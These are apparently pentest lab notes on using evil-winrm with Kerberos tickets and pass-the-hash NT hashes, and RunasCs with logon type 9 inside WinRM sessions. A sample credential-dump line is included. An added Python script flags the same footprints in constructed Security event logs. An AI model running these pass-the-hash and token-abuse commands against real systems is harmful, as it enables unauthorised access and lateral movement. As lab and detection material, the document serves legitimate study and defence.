Evil-winrm

Some commands won't work in a WinRM session: it is a remote (network) logon, and commands such as query user need a local/interactive logon token.

Using RunasCs we can run them anyway:

runasCs.exe {user} {pass} {command}

It can be run from inside the WinRM session without real credentials: pass dummy values (x x) and -l 9 (logon type 9, NewCredentials), which keeps the current token for local access and only applies the supplied credentials to outbound network authentication, so the command runs as if from a local logon.

runasCs.exe x x "query user" -l 9

Using evil-winrm with a Kerberos ticket (the ticket is read from the KRB5CCNAME environment variable; -r gives the realm, and the realm must be configured in /etc/krb5.conf; evil-winrm's -k flag is the SSL private key path, not the ticket):

evil-winrm -i dc01.vintage.htb -r vintage.htb
KRB5CCNAME=M.schoolbus.ccache evil-winrm -i frizzdc.frizz.htb -r frizz.htb

Using an NTLM hash (pass-the-hash). From a dump line in user:RID:LM-hash:NT-hash::: format, -H takes the NT hash (the fourth field); the LM field aad3b435b51404eeaad3b435b51404ee is the empty-LM placeholder:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::

evil-winrm -i dante.local -u Administrator -H 9bff06fe611486579fb74037890fda96
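Added example, not part of the original notes: a small triage script over constructed Windows Security events that flags the three footprints the notes above leave on the target, an NTLM network logon (4624, logon type 3) for the built-in Administrator, a NewCredentials logon (4624, logon type 9, logon process seclogo) of the kind runas /netonly style tools such as RunasCs -l 9 create, and a process spawned under wsmprovhost.exe, the host process for WinRM sessions. The field names follow the Security log schema; the thresholds and the TargetOutboundUserName field holding the dummy credentials are assumptions and the sample events are constructed, so treat the rules as a starting point rather than a vendor detection set.

```python
"""Triage of constructed Windows Security events for WinRM / pass-the-hash /
NewCredentials logon patterns.  Added example; not code from the notes."""
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int
    fields: dict


# Constructed sample events (assumed values; field names follow the Security log).
SAMPLE_EVENTS = [
    # evil-winrm -H style: NTLM network logon of RID 500 from a non-domain host
    Event(4624, {"TargetUserName": "Administrator", "TargetUserSid": "S-1-5-21-1-2-3-500",
                 "LogonType": "3", "LogonProcessName": "NtLmSsp",
                 "AuthenticationPackageName": "NTLM", "IpAddress": "10.10.14.5",
                 "WorkstationName": "KALI"}),
    # Kerberos ticket logon of an ordinary user: not flagged by these rules
    Event(4624, {"TargetUserName": "M.schoolbus", "TargetUserSid": "S-1-5-21-1-2-3-1105",
                 "LogonType": "3", "LogonProcessName": "Kerberos",
                 "AuthenticationPackageName": "Kerberos", "IpAddress": "10.10.14.5",
                 "WorkstationName": "-"}),
    # RunasCs x x ... -l 9: NewCredentials logon; dummy creds land in TargetOutbound* (assumed)
    Event(4624, {"TargetUserName": "M.schoolbus", "TargetUserSid": "S-1-5-21-1-2-3-1105",
                 "LogonType": "9", "LogonProcessName": "seclogo",
                 "AuthenticationPackageName": "Negotiate", "IpAddress": "::1",
                 "WorkstationName": "FRIZZDC", "TargetOutboundUserName": "x"}),
    # command run inside the WinRM session: parent is wsmprovhost.exe
    Event(4688, {"NewProcessName": r"C:\Windows\System32\query.exe",
                 "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
                 "SubjectUserName": "M.schoolbus"}),
    # benign interactive process: not flagged
    Event(4688, {"NewProcessName": r"C:\Windows\System32\notepad.exe",
                 "ParentProcessName": r"C:\Windows\explorer.exe",
                 "SubjectUserName": "M.schoolbus"}),
]


def rid_of(sid: str) -> str:
    """Last sub-authority of a SID; 500 is the built-in Administrator."""
    return sid.rsplit("-", 1)[-1]


def triage(events):
    """Return (rule, subject, context) tuples for events matching the heuristics."""
    alerts = []
    for ev in events:
        f = ev.fields
        if ev.event_id == 4624:
            logon_type = f.get("LogonType")
            # Rule 1: NTLM network logon of RID 500 -> candidate pass-the-hash
            if (logon_type == "3" and f.get("AuthenticationPackageName") == "NTLM"
                    and rid_of(f.get("TargetUserSid", "")) == "500"):
                alerts.append(("ntlm_admin_network_logon",
                               f.get("TargetUserName"), f.get("IpAddress")))
            # Rule 2: NewCredentials logon via seclogo -> runas /netonly style token
            if logon_type == "9" and f.get("LogonProcessName", "").lower() == "seclogo":
                alerts.append(("newcredentials_logon",
                               f.get("TargetOutboundUserName", "?"), f.get("WorkstationName")))
        elif ev.event_id == 4688:
            # Rule 3: anything spawned by the WinRM host process
            parent = f.get("ParentProcessName", "").lower()
            if parent.endswith("\\wsmprovhost.exe"):
                alerts.append(("winrm_child_process",
                               f.get("NewProcessName"), f.get("SubjectUserName")))
    return alerts


if __name__ == "__main__":
    for rule, subject, context in triage(SAMPLE_EVENTS):
        print(f"{rule:28} subject={subject!r} context={context!r}")
```

Rule 1 is noisy on its own in environments where local administrators legitimately use NTLM; correlating it with the source workstation (here a non-domain name) or with a following wsmprovhost.exe child process is what turns it into a useful signal.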